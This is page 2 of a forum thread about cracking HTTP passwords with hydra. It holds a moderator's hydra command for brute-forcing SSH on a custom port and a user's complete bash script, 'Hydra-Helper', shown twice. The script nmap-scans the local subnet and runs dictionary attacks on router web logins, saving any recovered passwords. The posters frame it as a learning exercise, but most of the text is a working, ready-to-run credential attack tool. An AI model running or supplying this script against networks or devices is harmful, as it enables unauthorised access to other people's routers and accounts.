Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 29

Thread: [Video] How to: Crack HTTP passwords (hydra)

  1. #11
    Just burned his ISO tyl3rs123's Avatar
    Join Date
    Aug 2010
    Posts
    7

    Angry Re: [Video] How to: Crack HTTP passwords (hydra)

    Great Post...well put..good info on that

  2. #12
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by dareeek View Post
    What do you mean by 'basic.auth'? User is authenticated by a password.
    Index page isn't protected in any way. Connection goes through http. SSL is not used.
    basic.auth
    If the index page isn't protect, try targeting another page that is!

    Quote Originally Posted by tyl3rs123 View Post
    Great Post...well put..good info on that
    Thanks for the thanks!
    Have you...g0tmi1k?

  3. #13
    Just burned his ISO
    Join Date
    Aug 2010
    Location
    everywhere
    Posts
    2

    Question Re: [Video] How to: Crack HTTP passwords (hydra)

    Nice, but how can we set port i.e: I'm setting my sshd to listen to port 1234 and and disable root access

  4. #14
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by rportnoy View Post
    Nice, but how can we set port i.e: I'm setting my sshd to listen to port 1234 and and disable root access
    -s PORT if the service is on a different default port, define it here
    I THINK it would look something like...
    Code:
    ./hydra  -l rportnoy -P /path/to/file.lst -e ns -f -s 1234 -vV ssh2
    Have you...g0tmi1k?

  5. #15
    Just burned his ISO mamece2's Avatar
    Join Date
    Sep 2010
    Location
    Venezuela
    Posts
    10

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    i dont like when passwords are gibberish

  6. #16
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by mamece2 View Post
    i dont like when passwords are gibberish
    Everything has an upside & downside
    Yes, when passwords are gibberish, doing a dictionary attack is alot harder...HOWEVER
    If it's hard for you to do it, it means it's hard for someone to do it to you
    Last edited by g0tmi1k; 09-25-2010 at 01:44 PM.
    Have you...g0tmi1k?

  7. #17
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    I threw together a script for myself when I saw this. It might be useful to someone else.

    #/bin/bash echo "######### - Hydra-Helper - MfJipfVz - Pastebin.com

    Any feedback would be appreciated. maybe an improvement? Its pretty simple but effective so far.

  8. #18
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by Scamentology View Post
    I threw together a script for myself when I saw this. It might be useful to someone else.

    #/bin/bash echo "######### - Hydra-Helper - MfJipfVz - Pastebin.com

    Any feedback would be appreciated. maybe an improvement? Its pretty simple but effective so far.
    Thanks for sharing Scamentology.
    I haven't be able to test it - but doing a quick once over - *some* index pages are not protected, all the other pages are. (Seen this on two routers - gives "guests" a brief overview of the network - then you need to login to do anything else...)
    Have you...g0tmi1k?

  9. #19
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Here's is the update if anyone wants it.

    Pastebin was down for me. soooo...

    Code:
    #/bin/bash
    echo "#####################################"
    echo "   Welcome to Hydra-Helper v$version"
    echo "    Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check /root/recovered.lst for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology                                                              #
    #---License------------------------------------------------------------------------------------#
    #  This program is free software: you can redistribute it and/or modify it under the terms     #
    #  of the GNU General Public License as published by the Free Software Foundation, either      #
    #  version 3 of the License, or (at your option) any later version.                            #
    #                                                                                              #
    #  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
    #  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
    #  See the GNU General Public License for more details.                                        #
    #                                                                                              #
    #  You should have received a copy of the GNU General Public License along with this program.  #
    #  If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so don't be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #Instructions
    #You will need to give the path to you password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    version=0.4
    #---------------------------------------------------------------------------------------------------------------------------------#
                             dictpath=/root/pass.lst
                             userpath=/root/user.lst
                              logfile=/tmp/logfile.lst
    #
    #
    #
    if [ ! -e "/usr/bin/nmap" ] ; then
       echo "Nmap is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
       if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
          echo "Failed to install Nmap"
       else
          display info "Installed: Nmap"
       fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
       echo "Hydra is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
       if [ ! -e "/usr/bin/hydra" ] ; then
          echo "Failed to install Hydra"
       else
          display info "Installed: Hydra"
       fi
    fi
    echo "Nmap and Hydra are installed. Lets continue..."
    IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG /tmp/nmap.lst -Pn $IP/24)                                                       #Tells us what ports are open.
    smb=$(grep '139/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
       if [ "$smb" != "" ]; then grep '139/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/smb.lst ; fi    
    http=$(grep '80/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
       if [ "$http" != "" ]; then grep '80/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/http.lst ; fi
    https=$(grep '443/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
       if [ "$https" != "" ]; then grep '443/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
    ftp=$(grep '21/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
       if [ "$ftp" != "" ]; then grep '21/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
    telnet=$(grep '23/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
       if [ "$telnet" != "" ]; then grep '23/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/telnet.lst ; fi
    #---------------------------------------------------------------------------------------------------------------------#
    #
    #Router Password Guesser
    ######################################
    username=/root/Hydra/user.lst
    dictpath=/root/Hydra/pass.lst
    tasks=15
    ######################################
    if [ -e "/tmp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o /tmp/tmp.lst" 
    grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst
       if [ -e "/tmp/rec1.lst" ] ; then grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst ; fi
       if [ ! -e "/tmp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
          #rm /tmp/tmp.lst /tmp/rec1.lst 2>/dev/null
    fi
    if [ -e "/tmp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o /tmp/tmp2.lst" 
    grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst
       if [ -e "/tmp/rec2.lst" ] ; then grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst ; fi
       if [ ! -e "/tmp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
          #rm /tmp/tmp.lst /tmp/rec2.lst 2>/dev/null
    fi
    ###############
    #insert removed code here (therest.lst)
    ###############
    #
    sleep 5
    killall xterm 2>/dev/null
    #---------------------------------------------------------------------------------------------------------------------#
    #
    #
    if [ ! -e "/tmp/rec1.lst" ] ; then
       echo "No HTTP passwords found" ; fi
    if [ -e "/tmp/rec1.lst" ] ; then
       grep 'password' /tmp/rec1.lst >> /root/recovered.lst 2>/dev/null ; fi
    if [ ! -e "/tmp/rec2.lst" ] ; then
       echo "No HTTPS passwords found" ; fi
    if [ -e "/tmp/rec2.lst" ] ; then
       grep 'password' /tmp/rec2.lst >> /root/recovered.lst 2>/dev/null ; fi
    if [ ! -e "/root/recovered.lst" ] ; then 
       echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat /root/recovered.lst
    #cleanup...
    rm /tmp/rec2.lst /tmp/rec3.lst /tmp/http.lst /tmp/https.lst /tmp/smb.lst /tmp/telnet.lst /tmp/ftp.lst /tmp/nmap.lst /tmp/rec5.lst /media/disk/mine/ISO/tools/hydra.restore 2>/dev/null
    exit
    #
    #
    #
    #todo
    #match IP addresses to passwords in /root/recovered.lst
    #add errors for missing stuff
    #add ssl support
    #add interupt and cleanup
    #add nmap options
    #add auto time and date to details
    #add scan to detect router brand and customize attack
    I have improved the script and have and added support for both http and https

    it works pretty flawlessly on my linksys wrt54g and my airlink 101 but wont work on the dlink that uses java.

    I will be adding ftp and smb support next

    Thanks. This is a learning experience for me so I'm doing this for fun..
    I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).

    I seem to be addicted to this.

  10. #20
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by Scamentology View Post
    Here's is the update if anyone wants it.

    Pastebin was down for me. soooo...

    Code:
    #/bin/bash
    echo "#####################################"
    echo "   Welcome to Hydra-Helper v$version"
    echo "    Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check /root/recovered.lst for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology                                                              #
    #---License------------------------------------------------------------------------------------#
    #  This program is free software: you can redistribute it and/or modify it under the terms     #
    #  of the GNU General Public License as published by the Free Software Foundation, either      #
    #  version 3 of the License, or (at your option) any later version.                            #
    #                                                                                              #
    #  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
    #  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
    #  See the GNU General Public License for more details.                                        #
    #                                                                                              #
    #  You should have received a copy of the GNU General Public License along with this program.  #
    #  If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so don't be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #Instructions
    #You will need to give the path to you password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    version=0.4
    #---------------------------------------------------------------------------------------------------------------------------------#
                             dictpath=/root/pass.lst
                             userpath=/root/user.lst
                              logfile=/tmp/logfile.lst
    #
    #
    #
    if [ ! -e "/usr/bin/nmap" ] ; then
       echo "Nmap is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
       if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
          echo "Failed to install Nmap"
       else
          display info "Installed: Nmap"
       fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
       echo "Hydra is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
       if [ ! -e "/usr/bin/hydra" ] ; then
          echo "Failed to install Hydra"
       else
          display info "Installed: Hydra"
       fi
    fi
    echo "Nmap and Hydra are installed. Lets continue..."
    IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG /tmp/nmap.lst -Pn $IP/24)                                                       #Tells us what ports are open.
    smb=$(grep '139/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
       if [ "$smb" != "" ]; then grep '139/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/smb.lst ; fi    
    http=$(grep '80/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
       if [ "$http" != "" ]; then grep '80/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/http.lst ; fi
    https=$(grep '443/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
       if [ "$https" != "" ]; then grep '443/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
    ftp=$(grep '21/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
       if [ "$ftp" != "" ]; then grep '21/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
    telnet=$(grep '23/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
       if [ "$telnet" != "" ]; then grep '23/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/telnet.lst ; fi
    #---------------------------------------------------------------------------------------------------------------------#
    #
    #Router Password Guesser
    ######################################
    username=/root/Hydra/user.lst
    dictpath=/root/Hydra/pass.lst
    tasks=15
    ######################################
    if [ -e "/tmp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o /tmp/tmp.lst" 
    grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst
       if [ -e "/tmp/rec1.lst" ] ; then grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst ; fi
       if [ ! -e "/tmp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
          #rm /tmp/tmp.lst /tmp/rec1.lst 2>/dev/null
    fi
    if [ -e "/tmp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o /tmp/tmp2.lst" 
    grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst
       if [ -e "/tmp/rec2.lst" ] ; then grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst ; fi
       if [ ! -e "/tmp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
          #rm /tmp/tmp.lst /tmp/rec2.lst 2>/dev/null
    fi
    ###############
    #insert removed code here (therest.lst)
    ###############
    #
    sleep 5
    killall xterm 2>/dev/null
    #---------------------------------------------------------------------------------------------------------------------#
    #
    #
    if [ ! -e "/tmp/rec1.lst" ] ; then
       echo "No HTTP passwords found" ; fi
    if [ -e "/tmp/rec1.lst" ] ; then
       grep 'password' /tmp/rec1.lst >> /root/recovered.lst 2>/dev/null ; fi
    if [ ! -e "/tmp/rec2.lst" ] ; then
       echo "No HTTPS passwords found" ; fi
    if [ -e "/tmp/rec2.lst" ] ; then
       grep 'password' /tmp/rec2.lst >> /root/recovered.lst 2>/dev/null ; fi
    if [ ! -e "/root/recovered.lst" ] ; then 
       echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat /root/recovered.lst
    #cleanup...
    rm /tmp/rec2.lst /tmp/rec3.lst /tmp/http.lst /tmp/https.lst /tmp/smb.lst /tmp/telnet.lst /tmp/ftp.lst /tmp/nmap.lst /tmp/rec5.lst /media/disk/mine/ISO/tools/hydra.restore 2>/dev/null
    exit
    #
    #
    #
    #todo
    #match IP addresses to passwords in /root/recovered.lst
    #add errors for missing stuff
    #add ssl support
    #add interupt and cleanup
    #add nmap options
    #add auto time and date to details
    #add scan to detect router brand and customize attack
    I have improved the script and have and added support for both http and https

    it works pretty flawlessly on my linksys wrt54g and my airlink 101 but wont work on the dlink that uses java.

    I will be adding ftp and smb support next

    Thanks. This is a learning experience for me so I'm doing this for fun..
    I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).

    I seem to be addicted to this.
    Glad to see that your still working on it, still making updates for it
    Start your own thread about it - more people will see it therefore you'll get more feedback on it! (=
    hehe, I spotted a bit of my code in there (= Glad to know its been put to good use!
    Yep, I understand what you mean - experience, addictive & fun.
    Have you...g0tmi1k?

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 50
    Last Post: 04-08-2011, 07:35 AM
  2. Hydra error
    By Valen in forum Beginners Forum
    Replies: 3
    Last Post: 07-09-2010, 03:11 AM
  3. Some trouble with medusa/hydra
    By necroth85 in forum Beginners Forum
    Replies: 0
    Last Post: 02-03-2010, 05:39 AM
  4. http-post-forms =how u do it????
    By blue_bsm in forum Beginners Forum
    Replies: 3
    Last Post: 01-16-2010, 05:25 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •